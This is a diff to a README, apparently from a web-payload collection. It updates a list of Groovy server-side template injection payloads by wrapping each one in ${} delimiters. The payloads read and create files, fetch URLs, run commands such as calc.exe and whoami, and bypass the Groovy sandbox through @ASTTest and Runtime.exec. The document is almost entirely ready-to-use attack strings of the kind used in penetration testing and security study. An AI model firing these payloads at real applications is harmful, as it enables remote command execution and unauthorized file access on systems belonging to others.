Update README.md

Server Side Template Injection/README.md

@@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")}
 
 [Official website](https://groovy-lang.org/)
 
-
 ### Groovy - Basic injection
 
 Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
 
-
 ### Groovy - Read and create File
 
 ```groovy
-String x = new File('c:/windows/notepad.exe').text
+${String x = new File('c:/windows/notepad.exe').text}
-String x = new File('/path/to/file').getText('UTF-8')
+${String x = new File('/path/to/file').getText('UTF-8')}
-new File("C:\Temp\FileName.txt").createNewFile();
+${new File("C:\Temp\FileName.txt").createNewFile();}
 ```
 
 ### Groovy - HTTP request:
 
-
 ```groovy
-"http://www.google.com".toURL().text
+${"http://www.google.com".toURL().text}
-new URL("http://www.google.com").getText()
+${new URL("http://www.google.com").getText()}
 ```
 
 ### Groovy - Command Execution
 
 ```groovy
-"calc.exe".exec()
+${"calc.exe".exec()}
-"calc.exe".execute()
+${"calc.exe".execute()}
-this.evaluate("9*9") //(this is a Script)
+${this.evaluate("9*9") //(this is a Script class)}
-new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
+${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
 ```
 
 ### Groovy - Sandbox Bypass
 
 ```groovy
-@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
+${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
-def x
+def x }
 ```
 
 or
 
 ```groovy
-new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
+${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
 ```
 
 ---